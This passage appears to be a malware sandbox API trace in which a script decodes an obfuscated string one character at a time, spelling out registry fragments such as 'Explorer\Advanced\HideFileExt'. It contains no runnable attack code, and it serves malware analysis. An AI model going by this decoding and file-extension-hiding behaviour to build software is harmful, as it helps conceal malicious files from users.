returned 0x0 [0167.411] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.412] VarSub (in: pvarLeft=0x28f9e0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.412] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x1150c54, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0167.412] VarCat (in: pvarLeft=0x28f940, pvarRight=0x28f920, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.412] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.413] VarSub (in: pvarLeft=0x28f9e0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.413] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x1167d8c, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0167.413] VarCat (in: pvarLeft=0x28f940, pvarRight=0x28f920, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.413] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="i\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.413] VarSub (in: pvarLeft=0x28f9e0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.413] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\\", cbMultiByte=1, lpWideCharStr=0x1150c54, cchWideChar=1 | out: lpWideCharStr="\\") returned 1 [0167.413] VarCat (in: pvarLeft=0x28f940, pvarRight=0x28f920, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.414] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="R", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="R\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.414] VarSub (in: pvarLeft=0x28f9e0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.414] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="E", cbMultiByte=1, lpWideCharStr=0x1167d8c, cchWideChar=1 | out: lpWideCharStr="E") returned 1 [0167.414] VarCat (in: pvarLeft=0x28f940, pvarRight=0x28f920, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.415] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="…", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="…\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.415] VarSub (in: pvarLeft=0x28f9e0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.415] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="x", cbMultiByte=1, lpWideCharStr=0x1150c54, cchWideChar=1 | out: lpWideCharStr="x") returned 1 [0167.415] VarCat (in: pvarLeft=0x28f940, pvarRight=0x28f920, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.415] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="}", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="}\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.415] VarSub (in: pvarLeft=0x28f9e0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.415] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="p", cbMultiByte=1, lpWideCharStr=0x1167d8c, cchWideChar=1 | out: lpWideCharStr="p") returned 1 [0167.416] VarCat (in: pvarLeft=0x28f940, pvarRight=0x28f920, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.416] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.416] VarSub (in: pvarLeft=0x28f9e0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.416] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x1150c54, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0167.416] VarCat (in: pvarLeft=0x28f940, pvarRight=0x28f920, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.417] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.417] VarSub (in: pvarLeft=0x28f9e0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.417] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x1167d8c, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0167.417] VarCat (in: pvarLeft=0x28f940, pvarRight=0x28f920, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.417] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x7f", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x7f\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.418] VarSub (in: pvarLeft=0x28f9e0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.418] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="r", cbMultiByte=1, lpWideCharStr=0x1150c54, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0167.418] VarCat (in: pvarLeft=0x28f940, pvarRight=0x28f920, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.418] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.418] VarSub (in: pvarLeft=0x28f9e0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.419] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x1167d8c, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0167.419] VarCat (in: pvarLeft=0x28f940, pvarRight=0x28f920, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.489] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x7f", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x7f\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.489] VarSub (in: pvarLeft=0x28f9e0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.489] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="r", cbMultiByte=1, lpWideCharStr=0x1150c54, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0167.490] VarCat (in: pvarLeft=0x28f940, pvarRight=0x28f920, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.490] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="i\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.490] VarSub (in: pvarLeft=0x28f9e0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.490] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\\", cbMultiByte=1, lpWideCharStr=0x1167d8c, cchWideChar=1 | out: lpWideCharStr="\\") returned 1 [0167.490] VarCat (in: pvarLeft=0x28f940, pvarRight=0x28f920, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.491] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="N", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.491] VarSub (in: pvarLeft=0x28f9e0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.491] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="A", cbMultiByte=1, lpWideCharStr=0x1150c54, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0167.491] VarCat (in: pvarLeft=0x28f940, pvarRight=0x28f920, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.491] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.492] VarSub (in: pvarLeft=0x28f9e0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.492] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x1167d8c, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0167.492] VarCat (in: pvarLeft=0x28f940, pvarRight=0x28f920, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.492] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ƒ", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x83\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.492] VarSub (in: pvarLeft=0x28f9e0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.493] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="v", cbMultiByte=1, lpWideCharStr=0x1150c54, cchWideChar=1 | out: lpWideCharStr="v") returned 1 [0167.493] VarCat (in: pvarLeft=0x28f940, pvarRight=0x28f920, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.493] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="n\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.493] VarSub (in: pvarLeft=0x28f9e0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.493] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="a", cbMultiByte=1, lpWideCharStr=0x1167d8c, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0167.493] VarCat (in: pvarLeft=0x28f940, pvarRight=0x28f920, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.494] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.494] VarSub (in: pvarLeft=0x28f9e0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.494] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x1150c54, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0167.494] VarCat (in: pvarLeft=0x28f940, pvarRight=0x28f920, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.495] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="p", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="p\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.495] VarSub (in: pvarLeft=0x28f9e0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.495] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="c", cbMultiByte=1, lpWideCharStr=0x1167d8c, cchWideChar=1 | out: lpWideCharStr="c") returned 1 [0167.495] VarCat (in: pvarLeft=0x28f940, pvarRight=0x28f920, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.496] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.496] VarSub (in: pvarLeft=0x28f9e0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.496] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x1150c54, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0167.496] VarCat (in: pvarLeft=0x28f940, pvarRight=0x28f920, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.496] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.497] VarSub (in: pvarLeft=0x28f9e0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.497] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x1167d8c, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0167.497] VarCat (in: pvarLeft=0x28f940, pvarRight=0x28f920, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.501] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="i\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.501] VarSub (in: pvarLeft=0x28f9e0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.502] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\\", cbMultiByte=1, lpWideCharStr=0x1150c54, cchWideChar=1 | out: lpWideCharStr="\\") returned 1 [0167.502] VarCat (in: pvarLeft=0x28f940, pvarRight=0x28f920, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.502] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="U", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="U\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.502] VarSub (in: pvarLeft=0x28f9e0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.502] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="H", cbMultiByte=1, lpWideCharStr=0x1167d8c, cchWideChar=1 | out: lpWideCharStr="H") returned 1 [0167.503] VarCat (in: pvarLeft=0x28f940, pvarRight=0x28f920, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.503] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="v", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="v\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.503] VarSub (in: pvarLeft=0x28f9e0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.503] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="i", cbMultiByte=1, lpWideCharStr=0x1150c54, cchWideChar=1 | out: lpWideCharStr="i") returned 1 [0167.503] VarCat (in: pvarLeft=0x28f940, pvarRight=0x28f920, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.504] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.504] VarSub (in: pvarLeft=0x28f9e0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.504] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x1167d8c, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0167.504] VarCat (in: pvarLeft=0x28f940, pvarRight=0x28f920, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.505] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.505] VarSub (in: pvarLeft=0x28f9e0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.505] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x1150c54, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0167.505] VarCat (in: pvarLeft=0x28f940, pvarRight=0x28f920, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.506] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="S", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="S\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.506] VarSub (in: pvarLeft=0x28f9e0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.506] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="F", cbMultiByte=1, lpWideCharStr=0x1167d8c, cchWideChar=1 | out: lpWideCharStr="F") returned 1 [0167.506] VarCat (in: pvarLeft=0x28f940, pvarRight=0x28f920, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.506] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="v", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="v\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.507] VarSub (in: pvarLeft=0x28f9e0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.507] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="i", cbMultiByte=1, lpWideCharStr=0x1150c54, cchWideChar=1 | out: lpWideCharStr="i") returned 1 [0167.507] VarCat (in: pvarLeft=0x28f940, pvarRight=0x28f920, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.507] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.508] VarSub (in: pvarLeft=0x28f9e0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.508] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x1167d8c, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0167.508] VarCat (in: pvarLeft=0x28f940, pvarRight=0x28f920, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.508] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.508] VarSub (in: pvarLeft=0x28f9e0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.509] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x1150c54, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0167.509] VarCat (in: pvarLeft=0x28f940, pvarRight=0x28f920, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.509] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="R", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="R\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.509] VarSub (in: pvarLeft=0x28f9e0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.509] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="E", cbMultiByte=1, lpWideCharStr=0x1167d8c, cchWideChar=1 | out: lpWideCharStr="E") returned 1 [0167.510] VarCat (in: pvarLeft=0x28f940, pvarRight=0x28f920, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.510] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="…", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="…\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.510] VarSub (in: pvarLeft=0x28f9e0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.510] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="x", cbMultiByte=1, lpWideCharStr=0x1150c54, cchWideChar=1 | out: lpWideCharStr="x") returned 1 [0167.510] VarCat (in: pvarLeft=0x28f940, pvarRight=0x28f920, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.511] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.511] VarSub (in: pvarLeft=0x28f9e0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.511] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x1167d8c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0167.511] VarCat (in: pvarLeft=0x28f940, pvarRight=0x28f920, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.512] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="U", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="U\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.512] VarSub (in: pvarLeft=0x28f930, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.512] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="H", cbMultiByte=1, lpWideCharStr=0x1150c54, cchWideChar=1 | out: lpWideCharStr="H") returned 1 [0167.512] VarCat (in: pvarLeft=0x28f8b0, pvarRight=0x28fa00, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.513] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="X", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="X\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.513] VarSub (in: pvarLeft=0x28f930, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.517] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="K", cbMultiByte=1, lpWideCharStr=0x1150de4, cchWideChar=1 | out: lpWideCharStr="K") returned 1 [0167.517] VarCat (in: pvarLeft=0x28f8b0, pvarRight=0x28fa00, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.517] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="R", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="R\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.517] VarSub (in: pvarLeft=0x28f930, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.518] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="E", cbMultiByte=1, lpWideCharStr=0x11596d4, cchWideChar=1 | out: lpWideCharStr="E") returned 1 [0167.518] VarCat (in: pvarLeft=0x28f8b0, pvarRight=0x28fa00, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.518] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="f", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="f\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.518] VarSub (in: pvarLeft=0x28f930, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.518] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Y", cbMultiByte=1, lpWideCharStr=0x1150c54, cchWideChar=1 | out: lpWideCharStr="Y") returned 1 [0167.519] VarCat (in: pvarLeft=0x28f8b0, pvarRight=0x28fa00, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.519] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="l\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.519] VarSub (in: pvarLeft=0x28f930, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.519] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="_", cbMultiByte=1, 